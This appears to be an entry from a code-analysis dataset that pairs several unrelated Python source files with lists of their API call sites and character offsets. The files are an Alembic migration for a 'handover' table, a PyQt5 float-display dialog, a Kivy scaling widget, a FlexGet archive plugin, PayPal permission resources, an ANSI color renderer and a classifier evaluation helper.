[((195, 218), 'sys.path.insert', 'sys.path.insert', (['(0)', '"""."""'], {}), "(0, '.')\n", (210, 218), False, 'import sys\n'), ((234, 259), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (249, 259), False, 'import os\n'), ((274, 322), 'os.path.join', 'os.path.join', (['CURRENT_DIR', '"""lightgbm/libpath.py"""'], {}), "(CURRENT_DIR, 'lightgbm/libpath.py')\n", (286, 322), False, 'import os\n'), ((454, 488), 'os.path.relpath', 'os.path.relpath', (['path', 'CURRENT_DIR'], {}), '(path, CURRENT_DIR)\n', (469, 488), False, 'import os\n'), ((838, 853), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (851, 853), False, 'from setuptools import find_packages, setup\n')]
|
"""entries table
Revision ID: 11848f9f4372
Revises: e<PASSWORD>
Create Date: 2021-05-20 13:39:16.441005
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '11848f9f4372'
down_revision = 'eb<PASSWORD>d363477'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('handover',
sa.Column('ho_id', sa.Integer(), nullable=False),
sa.Column('ticket', sa.String(length=64), nullable=False),
sa.Column('ticket_type', sa.String(length=64), nullable=False),
sa.Column('servers', sa.String(length=300), nullable=False),
sa.Column('platform', sa.Integer(), nullable=True),
sa.Column('steps', sa.String(length=300), nullable=False),
sa.Column('next_steps', sa.String(length=300), nullable=False),
sa.Column('chat_url', sa.String(length=300), nullable=False),
sa.Column('owner', sa.Integer(), nullable=True),
sa.Column('old_owners', sa.String(length=300), nullable=False),
sa.Column('is_active', sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint('ho_id')
)
op.create_index(op.f('ix_handover_chat_url'), 'handover', ['chat_url'], unique=False)
op.create_index(op.f('ix_handover_next_steps'), 'handover', ['next_steps'], unique=False)
op.create_index(op.f('ix_handover_old_owners'), 'handover', ['old_owners'], unique=False)
op.create_index(op.f('ix_handover_servers'), 'handover', ['servers'], unique=False)
op.create_index(op.f('ix_handover_steps'), 'handover', ['steps'], unique=False)
op.create_index(op.f('ix_handover_ticket'), 'handover', ['ticket'], unique=False)
op.create_index(op.f('ix_handover_ticket_type'), 'handover', ['ticket_type'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_handover_ticket_type'), table_name='handover')
op.drop_index(op.f('ix_handover_ticket'), table_name='handover')
op.drop_index(op.f('ix_handover_steps'), table_name='handover')
op.drop_index(op.f('ix_handover_servers'), table_name='handover')
op.drop_index(op.f('ix_handover_old_owners'), table_name='handover')
op.drop_index(op.f('ix_handover_next_steps'), table_name='handover')
op.drop_index(op.f('ix_handover_chat_url'), table_name='handover')
op.drop_table('handover')
# ### end Alembic commands ###
|
[
"alembic.op.drop_table",
"alembic.op.f",
"sqlalchemy.PrimaryKeyConstraint",
"sqlalchemy.Boolean",
"sqlalchemy.String",
"sqlalchemy.Integer"
] |
[((2396, 2421), 'alembic.op.drop_table', 'op.drop_table', (['"""handover"""'], {}), "('handover')\n", (2409, 2421), False, 'from alembic import op\n'), ((1103, 1135), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""ho_id"""'], {}), "('ho_id')\n", (1126, 1135), True, 'import sqlalchemy as sa\n'), ((1162, 1190), 'alembic.op.f', 'op.f', (['"""ix_handover_chat_url"""'], {}), "('ix_handover_chat_url')\n", (1166, 1190), False, 'from alembic import op\n'), ((1252, 1282), 'alembic.op.f', 'op.f', (['"""ix_handover_next_steps"""'], {}), "('ix_handover_next_steps')\n", (1256, 1282), False, 'from alembic import op\n'), ((1346, 1376), 'alembic.op.f', 'op.f', (['"""ix_handover_old_owners"""'], {}), "('ix_handover_old_owners')\n", (1350, 1376), False, 'from alembic import op\n'), ((1440, 1467), 'alembic.op.f', 'op.f', (['"""ix_handover_servers"""'], {}), "('ix_handover_servers')\n", (1444, 1467), False, 'from alembic import op\n'), ((1528, 1553), 'alembic.op.f', 'op.f', (['"""ix_handover_steps"""'], {}), "('ix_handover_steps')\n", (1532, 1553), False, 'from alembic import op\n'), ((1612, 1638), 'alembic.op.f', 'op.f', (['"""ix_handover_ticket"""'], {}), "('ix_handover_ticket')\n", (1616, 1638), False, 'from alembic import op\n'), ((1698, 1729), 'alembic.op.f', 'op.f', (['"""ix_handover_ticket_type"""'], {}), "('ix_handover_ticket_type')\n", (1702, 1729), False, 'from alembic import op\n'), ((1912, 1943), 'alembic.op.f', 'op.f', (['"""ix_handover_ticket_type"""'], {}), "('ix_handover_ticket_type')\n", (1916, 1943), False, 'from alembic import op\n'), ((1986, 2012), 'alembic.op.f', 'op.f', (['"""ix_handover_ticket"""'], {}), "('ix_handover_ticket')\n", (1990, 2012), False, 'from alembic import op\n'), ((2055, 2080), 'alembic.op.f', 'op.f', (['"""ix_handover_steps"""'], {}), "('ix_handover_steps')\n", (2059, 2080), False, 'from alembic import op\n'), ((2123, 2150), 'alembic.op.f', 'op.f', (['"""ix_handover_servers"""'], {}), "('ix_handover_servers')\n", (2127, 2150), False, 'from alembic import op\n'), ((2193, 2223), 'alembic.op.f', 'op.f', (['"""ix_handover_old_owners"""'], {}), "('ix_handover_old_owners')\n", (2197, 2223), False, 'from alembic import op\n'), ((2266, 2296), 'alembic.op.f', 'op.f', (['"""ix_handover_next_steps"""'], {}), "('ix_handover_next_steps')\n", (2270, 2296), False, 'from alembic import op\n'), ((2339, 2367), 'alembic.op.f', 'op.f', (['"""ix_handover_chat_url"""'], {}), "('ix_handover_chat_url')\n", (2343, 2367), False, 'from alembic import op\n'), ((441, 453), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (451, 453), True, 'import sqlalchemy as sa\n'), ((496, 516), 'sqlalchemy.String', 'sa.String', ([], {'length': '(64)'}), '(length=64)\n', (505, 516), True, 'import sqlalchemy as sa\n'), ((564, 584), 'sqlalchemy.String', 'sa.String', ([], {'length': '(64)'}), '(length=64)\n', (573, 584), True, 'import sqlalchemy as sa\n'), ((628, 649), 'sqlalchemy.String', 'sa.String', ([], {'length': '(300)'}), '(length=300)\n', (637, 649), True, 'import sqlalchemy as sa\n'), ((694, 706), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (704, 706), True, 'import sqlalchemy as sa\n'), ((747, 768), 'sqlalchemy.String', 'sa.String', ([], {'length': '(300)'}), '(length=300)\n', (756, 768), True, 'import sqlalchemy as sa\n'), ((815, 836), 'sqlalchemy.String', 'sa.String', ([], {'length': '(300)'}), '(length=300)\n', (824, 836), True, 'import sqlalchemy as sa\n'), ((881, 902), 'sqlalchemy.String', 'sa.String', ([], {'length': '(300)'}), '(length=300)\n', (890, 902), True, 'import sqlalchemy as sa\n'), ((944, 956), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (954, 956), True, 'import sqlalchemy as sa\n'), ((1002, 1023), 'sqlalchemy.String', 'sa.String', ([], {'length': '(300)'}), '(length=300)\n', (1011, 1023), True, 'import sqlalchemy as sa\n'), ((1069, 1081), 'sqlalchemy.Boolean', 'sa.Boolean', ([], {}), '()\n', (1079, 1081), True, 'import sqlalchemy as sa\n')]
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'float_display_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_FloatDisplayDialog(object):
def setupUi(self, FloatDisplayDialog):
FloatDisplayDialog.setObjectName("FloatDisplayDialog")
FloatDisplayDialog.setWindowModality(QtCore.Qt.WindowModal)
FloatDisplayDialog.resize(398, 129)
FloatDisplayDialog.setModal(True)
self.layoutWidget = QtWidgets.QWidget(FloatDisplayDialog)
self.layoutWidget.setGeometry(QtCore.QRect(17, 13, 371, 105))
self.layoutWidget.setObjectName("layoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.formLayout = QtWidgets.QFormLayout()
self.formLayout.setObjectName("formLayout")
self.floatPrecisionLabel = QtWidgets.QLabel(self.layoutWidget)
self.floatPrecisionLabel.setObjectName("floatPrecisionLabel")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.floatPrecisionLabel)
self.floatDisplayTypeLabel = QtWidgets.QLabel(self.layoutWidget)
self.floatDisplayTypeLabel.setObjectName("floatDisplayTypeLabel")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.floatDisplayTypeLabel)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.fix_radioButton = QtWidgets.QRadioButton(self.layoutWidget)
self.fix_radioButton.setChecked(True)
self.fix_radioButton.setObjectName("fix_radioButton")
self.horizontalLayout.addWidget(self.fix_radioButton)
self.sci_radioButton = QtWidgets.QRadioButton(self.layoutWidget)
self.sci_radioButton.setObjectName("sci_radioButton")
self.horizontalLayout.addWidget(self.sci_radioButton)
self.formLayout.setLayout(1, QtWidgets.QFormLayout.FieldRole, self.horizontalLayout)
self.floatPrecision_spinBox = QtWidgets.QSpinBox(self.layoutWidget)
self.floatPrecision_spinBox.setObjectName("floatPrecision_spinBox")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.floatPrecision_spinBox)
self.verticalLayout.addLayout(self.formLayout)
self.buttonBox = QtWidgets.QDialogButtonBox(self.layoutWidget)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.verticalLayout.addWidget(self.buttonBox)
self.retranslateUi(FloatDisplayDialog)
self.buttonBox.accepted.connect(FloatDisplayDialog.accept)
self.buttonBox.rejected.connect(FloatDisplayDialog.reject)
QtCore.QMetaObject.connectSlotsByName(FloatDisplayDialog)
def retranslateUi(self, FloatDisplayDialog):
_translate = QtCore.QCoreApplication.translate
FloatDisplayDialog.setWindowTitle(_translate("FloatDisplayDialog", "Variable Name and Type"))
self.floatPrecisionLabel.setText(_translate("FloatDisplayDialog", "Float Precision"))
self.floatDisplayTypeLabel.setText(_translate("FloatDisplayDialog", "Float Display Type"))
self.fix_radioButton.setText(_translate("FloatDisplayDialog", "Fixed"))
self.sci_radioButton.setText(_translate("FloatDisplayDialog", "Scientific"))
|
[
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtWidgets.QRadioButton",
"PyQt5.QtCore.QRect",
"PyQt5.QtWidgets.QHBoxLayout",
"PyQt5.QtWidgets.QVBoxLayout",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"PyQt5.QtWidgets.QDialogButtonBox",
"PyQt5.QtWidgets.QSpinBox",
"PyQt5.QtWidgets.QFormLayout"
] |
[((577, 614), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['FloatDisplayDialog'], {}), '(FloatDisplayDialog)\n', (594, 614), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((771, 811), 'PyQt5.QtWidgets.QVBoxLayout', 'QtWidgets.QVBoxLayout', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (792, 811), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((957, 980), 'PyQt5.QtWidgets.QFormLayout', 'QtWidgets.QFormLayout', ([], {}), '()\n', (978, 980), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1068, 1103), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (1084, 1103), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1307, 1342), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (1323, 1342), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1547, 1570), 'PyQt5.QtWidgets.QHBoxLayout', 'QtWidgets.QHBoxLayout', ([], {}), '()\n', (1568, 1570), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1666, 1707), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (1688, 1707), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1909, 1950), 'PyQt5.QtWidgets.QRadioButton', 'QtWidgets.QRadioButton', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (1931, 1950), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2206, 2243), 'PyQt5.QtWidgets.QSpinBox', 'QtWidgets.QSpinBox', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (2224, 2243), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2499, 2544), 'PyQt5.QtWidgets.QDialogButtonBox', 'QtWidgets.QDialogButtonBox', (['self.layoutWidget'], {}), '(self.layoutWidget)\n', (2525, 2544), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3006, 3063), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['FloatDisplayDialog'], {}), '(FloatDisplayDialog)\n', (3043, 3063), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((653, 683), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(17)', '(13)', '(371)', '(105)'], {}), '(17, 13, 371, 105)\n', (665, 683), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')]
|
#!python
from kivy.uix.widget import Widget
from kivy.properties import NumericProperty, ObjectProperty
from kivy.base import EventLoop
from kivy.lang import Builder
class Scaler(Widget):
scale = NumericProperty(2)
container = ObjectProperty(None)
def __init__(self, **kwargs):
from kivy.base import EventLoop
from kivy.lang import Builder
Builder.load_string('''
<Scaler>:
container: container
canvas.before:
PushMatrix
Scale:
scale: root.scale
canvas.after:
PopMatrix
FloatLayout:
id: container
size: root.width / root.scale, root.height / root.scale
''')
super(Scaler, self).__init__(**kwargs)
EventLoop.add_postproc_module(self)
def get_parent_window(self):
return self.container
def add_widget(self, widget):
if self.container is not None:
return self.container.add_widget(widget)
return super(Scaler, self).add_widget(widget)
def remove_widget(self, widget):
if self.container is not None:
return self.container.remove_widget(widget)
return super(Scaler, self).remove_widget(widget)
def process_to_local(self, x, y, relative=False):
if x is None:
return None, None
s = float(self.scale)
return x / s, y / s
def process(self, events):
transform = self.process_to_local
transformed = []
for etype, event in events:
# you might have a move and up event in the same process
# then avoid the double-transformation
if event in transformed:
continue
transformed.append(event)
event.sx, event.sy = transform(event.sx, event.sy)
if etype == 'begin':
event.osx, event.osy = transform(event.osx, event.osy)
else:
# update the delta
event.dsx = event.sx - event.psx
event.dsy = event.sy - event.psy
return events
|
[
"kivy.base.EventLoop.add_postproc_module",
"kivy.properties.NumericProperty",
"kivy.lang.Builder.load_string",
"kivy.properties.ObjectProperty"
] |
[((201, 219), 'kivy.properties.NumericProperty', 'NumericProperty', (['(2)'], {}), '(2)\n', (216, 219), False, 'from kivy.properties import NumericProperty, ObjectProperty\n'), ((236, 256), 'kivy.properties.ObjectProperty', 'ObjectProperty', (['None'], {}), '(None)\n', (250, 256), False, 'from kivy.properties import NumericProperty, ObjectProperty\n'), ((378, 675), 'kivy.lang.Builder.load_string', 'Builder.load_string', (['"""\n<Scaler>:\n container: container\n canvas.before:\n PushMatrix\n Scale:\n scale: root.scale\n\n canvas.after:\n PopMatrix\n\n FloatLayout:\n id: container\n size: root.width / root.scale, root.height / root.scale\n"""'], {}), '(\n """\n<Scaler>:\n container: container\n canvas.before:\n PushMatrix\n Scale:\n scale: root.scale\n\n canvas.after:\n PopMatrix\n\n FloatLayout:\n id: container\n size: root.width / root.scale, root.height / root.scale\n"""\n )\n', (397, 675), False, 'from kivy.lang import Builder\n'), ((722, 757), 'kivy.base.EventLoop.add_postproc_module', 'EventLoop.add_postproc_module', (['self'], {}), '(self)\n', (751, 757), False, 'from kivy.base import EventLoop\n')]
|
import logging
import re
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.manager import Session
from . import db
log = logging.getLogger('archive')
class Archive:
"""
Archives all new items into database where they can be later searched and injected.
Stores the entries in the state as they are at the exit phase, this way task cleanup for title
etc is stored into the database. This may however make injecting them back to the original task work
wrongly.
"""
schema = {'oneOf': [{'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string'}}]}
def on_task_learn(self, task, config):
"""Add new entries into archive. We use learn phase in case the task corrects title or url via some plugins."""
if isinstance(config, bool):
tag_names = []
else:
tag_names = config
tags = []
for tag_name in set(tag_names):
tags.append(db.get_tag(tag_name, task.session))
count = 0
processed = []
for entry in task.entries + task.rejected + task.failed:
# I think entry can be in multiple of those lists .. not sure though!
if entry in processed:
continue
else:
processed.append(entry)
ae = (
task.session.query(db.ArchiveEntry)
.filter(db.ArchiveEntry.title == entry['title'])
.filter(db.ArchiveEntry.url == entry['url'])
.first()
)
if ae:
# add (missing) sources
source = db.get_source(task.name, task.session)
if source not in ae.sources:
log.debug('Adding `%s` into `%s` sources' % (task.name, ae))
ae.sources.append(source)
# add (missing) tags
for tag_name in tag_names:
atag = db.get_tag(tag_name, task.session)
if atag not in ae.tags:
log.debug('Adding tag %s into %s' % (tag_name, ae))
ae.tags.append(atag)
else:
# create new archive entry
ae = db.ArchiveEntry()
ae.title = entry['title']
ae.url = entry['url']
if 'description' in entry:
ae.description = entry['description']
ae.task = task.name
ae.sources.append(db.get_source(task.name, task.session))
if tags:
# note, we're extending empty list
ae.tags.extend(tags)
log.debug('Adding `%s` with %i tags to archive' % (ae, len(tags)))
task.session.add(ae)
count += 1
if count:
log.verbose('Added %i new entries to archive' % count)
def on_task_abort(self, task, config):
"""
Archive even on task abort, except if the abort has happened before session
was started.
"""
if task.session is not None:
self.on_task_learn(task, config)
class UrlrewriteArchive:
"""
Provides capability to rewrite urls from archive or make searches with discover.
"""
entry_map = {'title': 'title', 'url': 'url', 'description': 'description'}
schema = {'oneOf': [{'type': 'boolean'}, {'type': 'array', 'items': {'type': 'string'}}]}
def search(self, task, entry, config=None):
"""Search plugin API method"""
session = Session()
entries = set()
if isinstance(config, bool):
tag_names = None
else:
tag_names = config
try:
for query in entry.get('search_strings', [entry['title']]):
# clean some characters out of the string for better results
query = re.sub(r'[ \(\)]+', ' ', query).strip()
log.debug('looking for `%s` config: %s' % (query, config))
for archive_entry in db.search(session, query, tags=tag_names, desc=True):
log.debug('rewrite search result: %s' % archive_entry)
entry = Entry()
entry.update_using_map(self.entry_map, archive_entry, ignore_none=True)
if entry.isvalid():
entries.add(entry)
finally:
session.close()
log.debug('found %i entries' % len(entries))
return entries
@event('plugin.register')
def register_plugin():
plugin.register(Archive, 'archive', api_ver=2)
plugin.register(UrlrewriteArchive, 'flexget_archive', interfaces=['search'], api_ver=2)
|
[
"flexget.entry.Entry",
"flexget.event.event",
"flexget.manager.Session",
"flexget.plugin.register",
"re.sub",
"logging.getLogger"
] |
[((178, 206), 'logging.getLogger', 'logging.getLogger', (['"""archive"""'], {}), "('archive')\n", (195, 206), False, 'import logging\n'), ((4535, 4559), 'flexget.event.event', 'event', (['"""plugin.register"""'], {}), "('plugin.register')\n", (4540, 4559), False, 'from flexget.event import event\n'), ((4587, 4633), 'flexget.plugin.register', 'plugin.register', (['Archive', '"""archive"""'], {'api_ver': '(2)'}), "(Archive, 'archive', api_ver=2)\n", (4602, 4633), False, 'from flexget import plugin\n'), ((4638, 4729), 'flexget.plugin.register', 'plugin.register', (['UrlrewriteArchive', '"""flexget_archive"""'], {'interfaces': "['search']", 'api_ver': '(2)'}), "(UrlrewriteArchive, 'flexget_archive', interfaces=['search'],\n api_ver=2)\n", (4653, 4729), False, 'from flexget import plugin\n'), ((3588, 3597), 'flexget.manager.Session', 'Session', ([], {}), '()\n', (3595, 3597), False, 'from flexget.manager import Session\n'), ((4228, 4235), 'flexget.entry.Entry', 'Entry', ([], {}), '()\n', (4233, 4235), False, 'from flexget.entry import Entry\n'), ((3919, 3951), 're.sub', 're.sub', (['"""[ \\\\(\\\\)]+"""', '""" """', 'query'], {}), "('[ \\\\(\\\\)]+', ' ', query)\n", (3925, 3951), False, 'import re\n')]
|
from cached import Resource
from lib.paypal.client import get_client
from lib.paypal.forms import (CheckPermission, GetPermissionToken,
GetPermissionURL)
class GetPermissionURLResource(Resource):
class Meta(Resource.Meta):
resource_name = 'permission-url'
list_allowed_methods = ['post']
form = GetPermissionURL
method = 'get_permission_url'
class CheckPermissionResource(Resource):
class Meta(Resource.Meta):
resource_name = 'permission-check'
list_allowed_methods = ['post']
form = CheckPermission
method = 'check_permission'
class GetPermissionTokenResource(Resource):
class Meta(Resource.Meta):
resource_name = 'permission-token'
list_allowed_methods = ['post']
def obj_create(self, bundle, request, **kwargs):
form = GetPermissionToken(bundle.data)
if not form.is_valid():
raise self.form_errors(form)
paypal = get_client()
result = paypal.get_permission_token(*form.args())
seller = form.cleaned_data['seller']
seller.token = result['token']
seller.secret = result['secret']
seller.save()
bundle.obj = seller
return bundle
def dehydrate(self, bundle):
return {'token': bundle.obj.token_exists,
'secret': bundle.obj.secret_exists}
|
[
"lib.paypal.forms.GetPermissionToken",
"lib.paypal.client.get_client"
] |
[((867, 898), 'lib.paypal.forms.GetPermissionToken', 'GetPermissionToken', (['bundle.data'], {}), '(bundle.data)\n', (885, 898), False, 'from lib.paypal.forms import CheckPermission, GetPermissionToken, GetPermissionURL\n'), ((990, 1002), 'lib.paypal.client.get_client', 'get_client', ([], {}), '()\n', (1000, 1002), False, 'from lib.paypal.client import get_client\n')]
|
from typing import Union, ClassVar
import sty
from colour import Color
from autopalette.colormatch import ColorPoint, AnsiCodeType
from autopalette.palette import Ansi256Palette, Ansi16Palette, Ansi8Palette
from autopalette.utils import rgb_to_RGB255
OptionalColor = Union['Color', None]
OptionalPalette = ClassVar['BasePalette']
OptionalRenderer = ClassVar['Renderer']
class BaseRenderer(object):
def __init__(self,
palette: OptionalPalette = None,
fallback: OptionalPalette = None) -> None:
self.palette = palette if palette else Ansi256Palette()
self.fallback = fallback if fallback else Ansi256Palette()
def render(self, text, fg: Color, bg: OptionalColor = None):
raise NotImplementedError()
def is_bright(self, color: Color):
if color.get_saturation() == 0 \
and color.get_luminance() == 1:
return True
if color.get_luminance() > 0.7:
return True
if color.get_saturation() >= 0.3 \
and color.get_luminance() >= 0.3:
return True
return False
class Ansi256Renderer(BaseRenderer):
def render(self, text, fg: Color, bg: OptionalColor = None, ansi_reset=False):
if ansi_reset:
return text
fg = self.palette.match(fg, ansi=True)
if fg.ansi == '' or fg.ansi is None:
fg = self.fallback.match(fg.target, ansi=True)
if bg:
bg = self.palette.match(bg, ansi=True)
if bg.ansi == '' or bg.ansi is None:
bg = self.fallback.match(bg.target, ansi=True)
return self._render(text, fg=fg, bg=bg)
def _render(self, text, fg: ColorPoint, bg: ColorPoint = None):
out = ''
out += sty.fg(fg.ansi)
if bg:
out += sty.bg(bg.ansi)
out += text
out += sty.rs.all
return out
def is_bright(self, color: Color):
ansi = self.palette.match(color).ansi
if ansi < 16:
if ansi in (0, 1, 2, 3, 4, 5, 6, 8):
return False
return True
return super().is_bright(color)
def bg(self, color: Color) -> str:
return sty.bg(self.palette.match(color, ansi=True).ansi)
def fg(self, color: Color) -> str:
return sty.fg(self.palette.match(color, ansi=True).ansi)
@property
def rs(self):
return sty.rs
@property
def ef(self):
return sty.ef
class AnsiNoColorRenderer(Ansi256Renderer):
def render(self, text, fg: Color, bg: OptionalColor = None, ansi_reset=False):
return text
class Ansi16Renderer(Ansi256Renderer):
def __init__(self,
palette: OptionalPalette = None,
fallback: OptionalPalette = None) -> None:
super().__init__(palette=Ansi16Palette,
fallback=fallback)
def render(self, text, fg: Color, bg: OptionalColor = None, ansi_reset=False):
# todo: downsample 256 to 16 colors
return super().render(text, fg=fg, bg=bg, ansi_reset=False)
class Ansi8Renderer(Ansi256Renderer):
def __init__(self,
palette: OptionalPalette = None,
fallback: OptionalPalette = None) -> None:
super().__init__(palette=Ansi8Palette,
fallback=fallback)
def render(self, text, fg: Color, bg: OptionalColor = None, ansi_reset=False):
# todo: downsample 256 to 8 colors
return super().render(text, fg=fg, bg=bg, ansi_reset=False)
class AnsiTruecolorRenderer(BaseRenderer):
def match(self, color: Color) -> ColorPoint:
ansi = rgb_to_RGB255(color.rgb)
return ColorPoint(color, color, ansi=ansi)
def render(self, text, fg: Color, bg: OptionalColor = None, ansi_reset=False):
if ansi_reset:
return text
fg = self.palette.match(fg)
if bg:
bg = self.palette.match(bg)
return self._render(text, fg=fg, bg=bg)
def _render(self, text, fg: ColorPoint, bg: ColorPoint = None):
rgb = rgb_to_RGB255(fg.target.rgb)
out = ''
out += sty.fg(*rgb)
if bg:
bgrgb = rgb_to_RGB255(bg.target.rgb)
out += sty.bg(*bgrgb)
out += text
out += sty.rs.all
return out
def bg(self, color: Color) -> str:
bg = self.palette.match(color)
rgb = rgb_to_RGB255(bg.target.rgb)
return sty.fg(*rgb)
def fg(self, color: Color) -> str:
fg = self.palette.match(color)
rgb = rgb_to_RGB255(fg.target.rgb)
return sty.fg(*rgb)
@property
def rs(self):
return sty.rs
@property
def ef(self):
return sty.ef
render_map = {
'-1': AnsiTruecolorRenderer,
'0': AnsiNoColorRenderer,
'8': Ansi8Renderer,
'16': Ansi16Renderer,
'88': Ansi256Renderer,
'256': Ansi256Renderer,
'ansi': Ansi256Renderer,
'rgb': AnsiTruecolorRenderer,
'truecolor': AnsiTruecolorRenderer,
'24bit': AnsiTruecolorRenderer,
'vt100': AnsiNoColorRenderer,
'vt200': AnsiNoColorRenderer,
'vt220': AnsiNoColorRenderer,
'rxvt': Ansi16Renderer,
'rxvt-88color': Ansi256Renderer,
'xterm': Ansi16Renderer,
'xterm-color': Ansi16Renderer,
'xterm-256color': Ansi256Renderer,
}
|
[
"autopalette.colormatch.ColorPoint",
"sty.fg",
"autopalette.utils.rgb_to_RGB255",
"sty.bg",
"autopalette.palette.Ansi256Palette"
] |
[((1771, 1786), 'sty.fg', 'sty.fg', (['fg.ansi'], {}), '(fg.ansi)\n', (1777, 1786), False, 'import sty\n'), ((3653, 3677), 'autopalette.utils.rgb_to_RGB255', 'rgb_to_RGB255', (['color.rgb'], {}), '(color.rgb)\n', (3666, 3677), False, 'from autopalette.utils import rgb_to_RGB255\n'), ((3693, 3728), 'autopalette.colormatch.ColorPoint', 'ColorPoint', (['color', 'color'], {'ansi': 'ansi'}), '(color, color, ansi=ansi)\n', (3703, 3728), False, 'from autopalette.colormatch import ColorPoint, AnsiCodeType\n'), ((4082, 4110), 'autopalette.utils.rgb_to_RGB255', 'rgb_to_RGB255', (['fg.target.rgb'], {}), '(fg.target.rgb)\n', (4095, 4110), False, 'from autopalette.utils import rgb_to_RGB255\n'), ((4143, 4155), 'sty.fg', 'sty.fg', (['*rgb'], {}), '(*rgb)\n', (4149, 4155), False, 'import sty\n'), ((4412, 4440), 'autopalette.utils.rgb_to_RGB255', 'rgb_to_RGB255', (['bg.target.rgb'], {}), '(bg.target.rgb)\n', (4425, 4440), False, 'from autopalette.utils import rgb_to_RGB255\n'), ((4456, 4468), 'sty.fg', 'sty.fg', (['*rgb'], {}), '(*rgb)\n', (4462, 4468), False, 'import sty\n'), ((4562, 4590), 'autopalette.utils.rgb_to_RGB255', 'rgb_to_RGB255', (['fg.target.rgb'], {}), '(fg.target.rgb)\n', (4575, 4590), False, 'from autopalette.utils import rgb_to_RGB255\n'), ((4606, 4618), 'sty.fg', 'sty.fg', (['*rgb'], {}), '(*rgb)\n', (4612, 4618), False, 'import sty\n'), ((583, 599), 'autopalette.palette.Ansi256Palette', 'Ansi256Palette', ([], {}), '()\n', (597, 599), False, 'from autopalette.palette import Ansi256Palette, Ansi16Palette, Ansi8Palette\n'), ((650, 666), 'autopalette.palette.Ansi256Palette', 'Ansi256Palette', ([], {}), '()\n', (664, 666), False, 'from autopalette.palette import Ansi256Palette, Ansi16Palette, Ansi8Palette\n'), ((1821, 1836), 'sty.bg', 'sty.bg', (['bg.ansi'], {}), '(bg.ansi)\n', (1827, 1836), False, 'import sty\n'), ((4191, 4219), 'autopalette.utils.rgb_to_RGB255', 'rgb_to_RGB255', (['bg.target.rgb'], {}), '(bg.target.rgb)\n', (4204, 4219), False, 'from autopalette.utils import rgb_to_RGB255\n'), ((4239, 4253), 'sty.bg', 'sty.bg', (['*bgrgb'], {}), '(*bgrgb)\n', (4245, 4253), False, 'import sty\n')]
|
import logging
from src.evaluation.stats import stats_evaluation
console = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
console.setFormatter(formatter)
LOG = logging.getLogger("Random Dataset Validator")
LOG.addHandler(console)
LOG.setLevel(logging.INFO)
def random_dataset_split_eval(classifier, peptides_test, classification_test, test_size_percent):
"""
starts stats evaluation of predictions compared to known results,
and starts auc-plot, tree-plot, feature-importance-plot
:param classifier:
:param peptides_test:
:param classification_test:
:param test_size_percent: size of test dataset in percent/100
:return:
"""
LOG.info("Evaluating a random subset of size: " + str(test_size_percent) + " of the training data")
classification_pred = classifier.predict(peptides_test)
LOG.info("Successfully evaluated a random subset of the training data")
# plot_auc_curve(classifier)
# plot_learning_tree(classifier)
# plot_feature_importance(classifier)
stats_evaluation(classification_test, classification_pred)
|
[
"logging.Formatter",
"src.evaluation.stats.stats_evaluation",
"logging.StreamHandler",
"logging.getLogger"
] |
